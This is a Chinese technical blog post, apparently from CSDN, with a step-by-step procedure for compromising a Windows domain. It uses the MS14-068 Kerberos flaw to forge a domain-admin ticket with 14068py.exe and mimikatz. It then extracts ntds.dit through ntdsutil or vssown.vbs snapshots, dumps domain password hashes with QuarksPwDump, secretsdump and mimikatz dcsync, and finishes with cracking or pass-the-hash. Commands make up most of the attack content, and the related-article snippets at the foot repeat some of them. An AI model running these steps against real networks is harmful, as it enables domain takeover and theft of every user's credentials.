内网渗透之——域渗透中利用ms-14-068漏洞进行票据伪装获取域管账号密码

最新推荐文章于 2024-09-21 00:18:04 发布
最新推荐文章于 2024-09-21 00:18:04 发布
阅读量2.5k 收藏 7
点赞数 1
分类专栏: 渗透测试(内网渗透)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wsnbbz/article/details/105207060
版权

利用过程

1.利用该漏洞伪装票据

2.导出域hash值

3.破解利用hash值

一、利用漏洞伪装票据

条件

知道域名,sid,并拥有一个域普通用户的账号密码和知道域控的名称

步骤

1.拿到一台普通域用户机器,获取sid

whoami /all

2.域名,域控名获取

域名获取:

ipconfig /all  

查询域控:

net time /domain

3.上传14068py.exe,命令行输入命令进行票据伪装,会在当前目录下生成一个TGT文件

14068py.exe -u 域用户全称 -p "密码" -s sid -d 域控名全称

用户全名为:用户名@域名

4.输入klist purge可删除所有票据

5.上传mimikatz.exe,输入命令使用刚才伪装的票据

mimikatz.exe "kerberos::ptc xxxxx" exit

xxxxx处替换刚才生成的TGT文件名

6.输入klist查看票据,替换成功

7.无需输入密码即可查看域控的c盘目录,说明域管身份的票据伪装成功

dir \\域控全称\c$

二、导出域hash值

·获取ntds.dit并分析获得hash

思路

    1.票据伪装成功后远程连接,利用计划任务或远程执行控制DC执行命令(此处实验直接在dc进行,利用计划任务或远程执行控制DC执行命令点击此处跳转到详细使用方法)
    2.利用工具获取、分析得到域hash值

1.获取ntds.dit

1.1 利用ntdsutil(win8之后自带)导出ntds.dit

1.1.1 交互式shell:

输入ntdsutil进入交互式界面

输入snapshot进入快照功能

将活动实例设置为ntds

activate instance ntds

输入create创建快照

将快照挂载到c盘,此时c盘就出现了一个和c盘内容一样的快照,并且没有被占用

mount 快照名

 

退出ntdsutil,复制快照下的ntds.dit到指定路径(离线分析还需要复制快照里的Windows\System32\config\SYSTEM,在线分析省略)

copy C:\$SNAP_202003310959_VOLUMEC$\Windows\NTDS\ntds.dit c:\

再次进入ntdsutil的快照功能,删除快照

ntdsutil
snapshot
unmount 快照名

1.1.2 非交互式shell:

输入以下命令直接一次性创建快照并退出

ntdsutil snapshot "activate instance ntds" create quit quit

输入以下命令挂载刚刚生成的快照

ntdsutil snapshot "mount 快照名" quit quit

复制快照下的ntds.dit到指定路径(离线分析还需要复制快照里的Windows\System32\config\SYSTEM,在线分析省略)

copy C:\$SNAP_202003311014_VOLUMEC$\Windows\NTDS\ntds.dit c:\ntds1.dit

删除快照

ntdsutil snapshot "unmount 快照名" quit quit

1.2 vssown.vbs提取ntds.dit

上传脚本并开始运行脚本

cscript vssown.vbs /start

查看运行状态

cscript vssown.vbs /status


创建c盘的快照

cscript vssown.vbs /create C

查看快照信息

cscript vssown.vbs /list

\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1        即为c盘快照的根目录路

将快照里的ntds.dit复制到当前目录

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit ntds.dit

将快照里的SYSTEM复制到当前目录(离线分析需要,在线分析省略)

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM SYSTEM

删除创建的快照

cscript vssown.vbs /delete *

停止脚本运行

cscript vssown.vbs /stop

2.分析ntds.dit

2.1 利用QuarkPwDump在线分析

上传QuarkPwDump.exe到目标机c:/

输入命令获取ntds.dit里的域用户密码

QuarksPwDump.exe --dump-hash-domain --with-history --ntds-file ntds.dit路径

2.2 利用kali里的impacket-secretsdump离线分析

复制生成的ntds.dit和SYSTEM到kali

终端输入命令破解ntds.dit

impacket-secretsdump -ntds ntds.dit -system SYSTEM local

 

·mimikatz提取hash

条件

获取普通域成员机的shell即可

步骤

在上述14068伪装票据的基础上远程连接dc

输入mimikatz.exe进入软件

提取指定域用户的hash值

lsadump::dcsync /domain:域名 /user:用户名 /csv

三、破解密码

利用破解工具,cmd5进行破解,破解不成功可尝试hash注入

点击此处查看hash注入具体使用方法

卖N孩的X火柴
关注
专栏目录
内网拓展——渗透之ms-14-068利用
cxrpty的博客
03-30 1295
实验条件: 1.必须知道 2.必须知道账号密码 3.sid 4.控 实验步骤: 一、利用ms-14-068漏洞进行票据伪造 1.获取普通用户的sid whoami /all 2.获取名和控名 ipconfig /all net view /domain或net time /domain 3.上传14068py.exe,输入命令进行票据伪装,生成...
内网安全之:Kerberos 用户提权漏洞(MS14-068;CVE-2014-6324)
f_carey的博客
12-08 1886
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记的技术进行违法活动,利用笔记的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Kerberos 用户提权漏洞(MS14-068;CVE-2014-63241 pyKEK 工具包2 MSF ms14_068 利用3 goldenPac.py4 防范 Kerberos MS14-068 漏洞 Microsoft Security Bulletin MS14-068 - Critical.
Catalyze安全知识库
mashiro_hibiki的博客
05-21 384
高质量安全知识星球社区,致力于漏洞挖掘,渗透技巧,安全资料,星球承诺会持续更新0/1/NDay及对应的批量利用工具,团队内部漏洞库,内外网攻防技巧,你所需要的各类安全工具和资料以及团队师傅们最新的学习研究成果。分享行业内最新动态,解答交流各类技术问题。涉及方向包括Web渗透、免杀绕过、红蓝攻防、代码审计、应急响应、安全培训、CTF、小白入门、职业规划和疑难解答。
环境搭建到 MS14-068 提升为权限
weixin_30827565的博客
05-16 117
搭建环境 修改win2003(控)计算机名为"DCwin03",修改ip     配置成 DNS 服务器,"开始--控制面板--添加或删除程序--添加/删除 windows 组件"     运行:"dcpromo","新控制器--在新林",下一步,设置还原密码     运行"dsa.msc" 添加一个普通用户   添加 xp 到     通过 MS14-0...
Kerberos自我总结Kerberos自我总结
最新发布
Thewei666的博客
09-21 1407
名: redteam.lab控:操作系统: Windows Server 2016主机名: DC2016内主机:操作系统: Windows 10主机名: WIN10-1攻击机:操作系统: kali Liux这里Kali也在内网,主要是便于技术的展示,在实际情况需要搭建代理,可以收用frp、chisel等攻击,再使用proxychains进行代理的连接!名: redteam.lab控制器:操作系统: Windows Server 2016主机名: DC2016。
内提权之MS14-068
内心不种满鲜花就会长满杂草
03-17 4864
目标:普通成员——>域管理员 漏洞利用前提 控没有打MS14-068的补丁(KB3011780) 拿下一台加入的计算机 有这台内计算机的用户密码和Sid 漏洞复现 环境: win2012(192.168.10.2) 控,开启了防火墙 win7(192.168.10.5),成员 1. win7获取账户的密码及sid值 win7机器上查看域管理员,可发现,并没有自己 这里使用mimikatz去抓取用户的明文密码 mimikatz.exe "privilege:....
MS14-068提权)漏洞复现
weixin_50985113的博客
06-29 802
这里便用到了我们之前所讲到的 PAC 这个东西,PAC 是用来验证 Client 的访问权限的,它会被TGT 里发送给 Client,然后由 Client 发送给 TGS。但也恰恰是这个 PAC 造成了 MS14-068 这个漏洞。该漏洞是位于 kdcsvc.dll 控制器的密钥分发心(KDC)服务的 Windows 漏洞,它允许经过身份验证的用户在其获得的票证 TGT 插入任意的 PAC。普通用户可以通过呈现具有改变了 PAC 的 TGT 来伪造票据获得管理员权限。
复现MS14-068
这里是Y.lin的博客,你好,很高兴云里相遇!希望能给你提供一点帮助
05-23 880
MS14-068
内网渗透渗透.pdf
08-07
文档提到了MS14-068,这是一个广泛被利用的安全漏洞,攻击者可以通过它入侵目标系统。MS14-068涉及的是Windows系统一个名为“远程桌面协议”(Remote Desktop Protocol,简称RDP)的漏洞。为了进行渗透,攻击者...
MS14-068渗透
bailandawang123的博客
03-10 530
ms14068主要是通过伪造域管的tgt,将普通用户提升为域管用户,从而控制控。
MS14-068AD提权神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit TGT_user-a-1@dom-a.loc.ccache指的是第一步所生成的ccache文件。 3. kerberos::ptc TGT_secpulse@secpulse.local.ccache 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~
如何破解控服务器管理员密码
02-23
文档介绍,如果忘记控密码,如何进行破解,怎么样操作
【MS14-068漏洞复现】
一纸荒芜的博客
08-26 3427
ms14-068漏洞复现
内网渗透之Vulnstack4靶场的全方位打法
xf555er的博客
12-29 1722
MS14-068是一个著名的Windows Kerberos安全漏洞,允许攻击者篡改Kerberos票据,从而获取非法提权。这个漏洞特别影响Windows控制器,能让攻击者伪造Kerberos票据获取内几乎任意账户的权限,包括域管理员权限。这使得攻击者可以在网络随意访问和控制资源。
渗透 | kerberos认证及过程产生的攻击
st3pby的博客
02-20 7154
Windows认证一般包括本地认证(NTLM HASH)和认证(kerberos)。认证的原理网上有很多文章。如果喜欢听视频课程的话,这里推荐倾旋师傅的分享课本篇文章主要内容是Kerberos认证过程产生的攻击。Kerberos是由麻省理工学院提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。Kerberos协议有两个基础认证模块:和,以及微软扩展的两个认证模块S4U和PAC。kerberos是一种基于票据的认证方式。
通过 Cobalt Strike 利用 ms14-068
weixin_30737363的博客
11-19 831
拓扑图 攻击者(kali) 位于 192.168.245.0/24 网段,环境位于 192.168.31.0/24 网段。 有一台 win7 有两张网卡,可以同时访问两个网段,以这台机器作为跳板机进入环境。 假设现在已经有一组用户的账号密码 user1 321!@#qwe 获取用户的 sid whoami /user 下面使用 pykek 生成票据,首先用 cs 开一个 socks...
用户本地管理员密码破解
热门推荐
lh315936716的博客
10-27 1万+
公司电脑装软件很麻烦 研究了一下感觉很有意思 把自己账户设置成管理员就随便安装了 转载一下 http://blog.51cto.com/seawind/1875702 https://blog.csdn.net/yhc87/article/details/38780853...
Impacket官方使用指南
weixin_30877755的博客
04-09 2882
什么是Impacket Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。 有关某些工具的说明,请访问:https:/...
授权渗透实践:利用MS14-68漏洞操控内网
作者注意到控未打上KB3011780补丁,因此利用Mimikatz工具(一个强大的Windows安全工具集)和MS14-068漏洞exploit来获取控的系统信息,包括清除内存的Kerberos票据。 接下来,作者通过执行`whoami/all`命令...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值